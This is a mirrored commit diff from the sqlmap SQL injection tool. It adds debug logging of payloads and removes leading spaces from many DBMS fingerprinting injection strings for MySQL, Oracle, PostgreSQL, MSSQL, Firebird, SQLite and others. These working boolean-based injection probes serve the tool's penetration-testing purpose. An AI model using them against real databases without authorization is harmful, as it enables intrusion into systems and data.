sqlmapproject/sqlmap
1
1
Fork 0
mirror of https://github.com/sqlmapproject/sqlmap.git synced 2025-11-04 09:57:38 +03:00
Code Issues Packages Projects Releases Wiki Activity

major improvement with display of payloads (all payloads are displayed now) and removal of "pesky" spaces

Browse Source
This commit is contained in:
Miroslav Stampar 2010-11-07 21:18:09 +00:00
parent 620fa1c8fb
commit d3e7e89e60
16 changed files with 35 additions and 42 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

4
lib/core/agent.py
View File

@ -36,8 +36,8 @@ class Agent:
kb.misc.stop = randomStr(6)
def payloadDirect(self, query):
if query.startswith(" AND "):
query = query.replace(" AND ", "SELECT ", 1)
if query.startswith("AND "):
query = query.replace("AND ", "SELECT ", 1)
elif query.startswith(" UNION ALL "):
query = query.replace(" UNION ALL ", "", 1)
elif query.startswith("; "):

5
lib/request/connect.py
View File

@ -318,6 +318,11 @@ class Connect:
value = agent.replacePayload(value, payload)
payload = agent.extractPayload(value)
if payload:
debugMsg = "payload: %s" % payload
logger.debug(debugMsg)
if place == "Cookie" and conf.cookieUrlencode:
value = agent.removePayloadDelimiters(value, False)
value = urlEncodeCookieValues(value)

3
lib/request/inject.py
View File

@ -399,9 +399,6 @@ def goStacked(expression, silent=False):
query = agent.prefixQuery("; %s" % expression)
query = agent.postfixQuery("%s;%s" % (query, comment))
debugMsg = "query: %s" % query
logger.debug(debugMsg)
payload = agent.payload(newValue=query)
page, _ = Request.queryPage(payload, content=True, silent=silent)

3
lib/techniques/blind/inference.py
View File

@ -75,9 +75,6 @@ def bisection(payload, expression, length=None, charsetType=None, firstChar=None
else:
expressionUnescaped = unescaper.unescape(expression)
debugMsg = "query: %s" % expressionUnescaped
logger.debug(debugMsg)
if length and not isinstance(length, int) and length.isdigit():
length = int(length)

3
lib/techniques/error/use.py
View File

@ -64,9 +64,6 @@ def errorUse(expression, returnPayload=False):
forgedQuery = safeStringFormat(query, (logic, randInt, startLimiter, expressionUnescaped, endLimiter))
debugMsg = "query: %s" % forgedQuery
logger.debug(debugMsg)
payload = agent.payload(newValue=forgedQuery)
result = Request.queryPage(payload, content=True)
match = re.search('%s(?P<result>.*?)%s' % (ERROR_START_CHAR, ERROR_END_CHAR), result[0], re.DOTALL | re.IGNORECASE)

3
lib/techniques/inband/union/use.py
View File

@ -197,9 +197,6 @@ def unionUse(expression, direct=False, unescape=True, resetCounter=False, nullCh
query = agent.forgeInbandQuery(expression, nullChar=nullChar)
payload = agent.payload(newValue=query)
debugMsg = "query: %s" % query
logger.debug(debugMsg)
# Perform the request
resultPage, _ = Request.queryPage(payload, content=True)
reqCount += 1

4
lib/utils/parenthesis.py
View File

@ -45,8 +45,8 @@ def checkForParenthesis():
randInt = randomInt()
randStr = randomStr()
query = case.usage.prefix.format % eval(case.usage.prefix.params) +\
case.usage.postfix.format % eval(case.usage.postfix.params)
query = case.usage.prefix.format % eval(case.usage.prefix.params)
query = query[:-1] + case.usage.postfix.format % eval(case.usage.postfix.params)
payload = agent.payload(newValue=query)
result = Request.queryPage(payload)

4
plugins/dbms/access/fingerprint.py
View File

@ -161,14 +161,14 @@ class Fingerprint(GenericFingerprint):
logMsg = "testing Microsoft Access"
logger.info(logMsg)
payload = agent.fullPayload(" AND VAL(CVAR(1))=1")
payload = agent.fullPayload("AND VAL(CVAR(1))=1")
result = Request.queryPage(payload)
if result:
logMsg = "confirming Microsoft Access"
logger.info(logMsg)
payload = agent.fullPayload(" AND IIF(ATN(2)>0,1,0) BETWEEN 2 AND 0")
payload = agent.fullPayload("AND IIF(ATN(2)>0,1,0) BETWEEN 2 AND 0")
result = Request.queryPage(payload)
if not result:

14
plugins/dbms/firebird/fingerprint.py
View File

@ -72,10 +72,10 @@ class Fingerprint(GenericFingerprint):
def __sysTablesCheck(self):
retVal = None
table = (
("1.0", [" AND EXISTS(SELECT CURRENT_USER FROM RDB$DATABASE)"]),
("1.5", [" AND NULLIF(%d,%d) IS NULL", " AND EXISTS(SELECT CURRENT_TRANSACTION FROM RDB$DATABASE)"]),
("2.0", [" AND EXISTS(SELECT CURRENT_TIME(0) FROM RDB$DATABASE)", " AND BIT_LENGTH(%d)>0", " AND CHAR_LENGTH(%d)>0"]),
("2.1", [" AND BIN_XOR(%d,%d)=0", " AND PI()>0.%d", " AND RAND()<1.%d", " AND FLOOR(1.%d)>=0"])
("1.0", ["AND EXISTS(SELECT CURRENT_USER FROM RDB$DATABASE)"]),
("1.5", ["AND NULLIF(%d,%d) IS NULL", "AND EXISTS(SELECT CURRENT_TRANSACTION FROM RDB$DATABASE)"]),
("2.0", ["AND EXISTS(SELECT CURRENT_TIME(0) FROM RDB$DATABASE)", "AND BIT_LENGTH(%d)>0", "AND CHAR_LENGTH(%d)>0"]),
("2.1", ["AND BIN_XOR(%d,%d)=0", "AND PI()>0.%d", "AND RAND()<1.%d", "AND FLOOR(1.%d)>=0"])
)
for i in xrange(len(table)):
@ -97,7 +97,7 @@ class Fingerprint(GenericFingerprint):
def __dialectCheck(self):
retVal = None
if kb.dbms:
payload = agent.fullPayload(" AND EXISTS(SELECT CURRENT_DATE FROM RDB$DATABASE)")
payload = agent.fullPayload("AND EXISTS(SELECT CURRENT_DATE FROM RDB$DATABASE)")
result = Request.queryPage(payload)
retVal = "dialect 3" if result else "dialect 1"
return retVal
@ -116,14 +116,14 @@ class Fingerprint(GenericFingerprint):
randInt = randomInt()
payload = agent.fullPayload(" AND EXISTS(SELECT * FROM RDB$DATABASE WHERE %d=%d)" % (randInt, randInt))
payload = agent.fullPayload("AND EXISTS(SELECT * FROM RDB$DATABASE WHERE %d=%d)" % (randInt, randInt))
result = Request.queryPage(payload)
if result:
logMsg = "confirming Firebird"
logger.info(logMsg)
payload = agent.fullPayload(" AND EXISTS(SELECT CURRENT_USER FROM RDB$DATABASE)")
payload = agent.fullPayload("AND EXISTS(SELECT CURRENT_USER FROM RDB$DATABASE)")
result = Request.queryPage(payload)
if not result:

4
plugins/dbms/maxdb/fingerprint.py
View File

@ -118,14 +118,14 @@ class Fingerprint(GenericFingerprint):
randInt = randomInt()
payload = agent.fullPayload(" AND NOROUND(%d)=%d" % (randInt, randInt))
payload = agent.fullPayload("AND NOROUND(%d)=%d" % (randInt, randInt))
result = Request.queryPage(payload)
if result:
logMsg = "confirming SAP MaxDB"
logger.info(logMsg)
payload = agent.fullPayload(" AND MAPCHAR(NULL,1,DEFAULTMAP) IS NULL")
payload = agent.fullPayload("AND MAPCHAR(NULL,1,DEFAULTMAP) IS NULL")
result = Request.queryPage(payload)
if not result:

8
plugins/dbms/mssqlserver/fingerprint.py
View File

@ -90,7 +90,7 @@ class Fingerprint(GenericFingerprint):
result = True
else:
randInt = randomInt()
payload = agent.fullPayload(" AND BINARY_CHECKSUM(%d)=BINARY_CHECKSUM(%d)" % (randInt, randInt))
payload = agent.fullPayload("AND BINARY_CHECKSUM(%d)=BINARY_CHECKSUM(%d)" % (randInt, randInt))
result = Request.queryPage(payload)
if result:
@ -99,10 +99,10 @@ class Fingerprint(GenericFingerprint):
for version in (0, 5, 8):
randInt = randomInt()
query = " AND %d=(SELECT (CASE WHEN (( SUBSTRING((@@VERSION), 22, 1)=2 AND SUBSTRING((@@VERSION), 25, 1)=%d ) OR ( SUBSTRING((@@VERSION), 23, 1)=2 AND SUBSTRING((@@VERSION), 26, 1)=%d )) THEN %d ELSE %d END))" % (randInt, version, version, randInt, (randInt + 1))
query = "AND %d=(SELECT (CASE WHEN (( SUBSTRING((@@VERSION), 22, 1)=2 AND SUBSTRING((@@VERSION), 25, 1)=%d ) OR ( SUBSTRING((@@VERSION), 23, 1)=2 AND SUBSTRING((@@VERSION), 26, 1)=%d )) THEN %d ELSE %d END))" % (randInt, version, version, randInt, (randInt + 1))
if conf.direct:
query = query.replace(" AND ", "SELECT 1 WHERE ", 1)
query = query.replace("AND ", "SELECT 1 WHERE ", 1)
payload = agent.fullPayload(query)
result = Request.queryPage(payload)
@ -124,7 +124,7 @@ class Fingerprint(GenericFingerprint):
break
else:
query = " AND %d=(SELECT (CASE WHEN (SUBSTRING((@@VERSION), 22, 1)=7) THEN %d ELSE %d END))" % (randInt, randInt, (randInt + 1))
query = "AND %d=(SELECT (CASE WHEN (SUBSTRING((@@VERSION), 22, 1)=7) THEN %d ELSE %d END))" % (randInt, randInt, (randInt + 1))
payload = agent.fullPayload(query)
result = Request.queryPage(payload)

4
plugins/dbms/mysql/fingerprint.py
View File

@ -156,14 +156,14 @@ class Fingerprint(GenericFingerprint):
logger.info(infoMsg)
randInt = getUnicode(randomInt(1))
payload = agent.fullPayload(" AND CONNECTION_ID()=CONNECTION_ID()")
payload = agent.fullPayload("AND CONNECTION_ID()=CONNECTION_ID()")
result = Request.queryPage(payload)
if result:
infoMsg = "confirming MySQL"
logger.info(infoMsg)
payload = agent.fullPayload(" AND ISNULL(1/0)" if kb.injPlace != "URI" else " AND ISNULL(1 DIV 0)")
payload = agent.fullPayload("AND ISNULL(1/0)" if kb.injPlace != "URI" else "AND ISNULL(1 DIV 0)")
result = Request.queryPage(payload)
if not result:

4
plugins/dbms/oracle/fingerprint.py
View File

@ -80,7 +80,7 @@ class Fingerprint(GenericFingerprint):
if conf.direct:
result = True
else:
payload = agent.fullPayload(" AND ROWNUM=ROWNUM")
payload = agent.fullPayload("AND ROWNUM=ROWNUM")
result = Request.queryPage(payload)
if result:
@ -92,7 +92,7 @@ class Fingerprint(GenericFingerprint):
if conf.direct:
result = True
else:
payload = agent.fullPayload(" AND LENGTH(SYSDATE)=LENGTH(SYSDATE)")
payload = agent.fullPayload("AND LENGTH(SYSDATE)=LENGTH(SYSDATE)")
result = Request.queryPage(payload)
if not result:

4
plugins/dbms/postgresql/fingerprint.py
View File

@ -86,14 +86,14 @@ class Fingerprint(GenericFingerprint):
randInt = getUnicode(randomInt(1))
payload = agent.fullPayload(" AND %s::int=%s" % (randInt, randInt))
payload = agent.fullPayload("AND %s::int=%s" % (randInt, randInt))
result = Request.queryPage(payload)
if result:
infoMsg = "confirming PostgreSQL"
logger.info(infoMsg)
payload = agent.fullPayload(" AND COALESCE(%s, NULL)=%s" % (randInt, randInt))
payload = agent.fullPayload("AND COALESCE(%s, NULL)=%s" % (randInt, randInt))
result = Request.queryPage(payload)
if not result:

4
plugins/dbms/sqlite/fingerprint.py
View File

@ -80,14 +80,14 @@ class Fingerprint(GenericFingerprint):
logMsg = "testing SQLite"
logger.info(logMsg)
payload = agent.fullPayload(" AND LAST_INSERT_ROWID()=LAST_INSERT_ROWID()")
payload = agent.fullPayload("AND LAST_INSERT_ROWID()=LAST_INSERT_ROWID()")
result = Request.queryPage(payload)
if result:
logMsg = "confirming SQLite"
logger.info(logMsg)
payload = agent.fullPayload(" AND SQLITE_VERSION()=SQLITE_VERSION()")
payload = agent.fullPayload("AND SQLITE_VERSION()=SQLITE_VERSION()")
result = Request.queryPage(payload)
if not result:

6
plugins/dbms/sybase/fingerprint.py
View File

@ -79,14 +79,14 @@ class Fingerprint(GenericFingerprint):
if conf.direct:
result = True
else:
payload = agent.fullPayload(" AND tempdb_id()=tempdb_id()")
payload = agent.fullPayload("AND tempdb_id()=tempdb_id()")
result = Request.queryPage(payload)
if result:
logMsg = "confirming Sybase"
logger.info(logMsg)
payload = agent.fullPayload(" AND suser_id()=suser_id()")
payload = agent.fullPayload("AND suser_id()=suser_id()")
result = Request.queryPage(payload)
if not result:
@ -104,7 +104,7 @@ class Fingerprint(GenericFingerprint):
for version in range(12, 16):
randInt = randomInt()
query = " AND @@VERSION_NUMBER/1000=%d" % version
query = "AND @@VERSION_NUMBER/1000=%d" % version
payload = agent.fullPayload(query)
result = Request.queryPage(payload)
if result: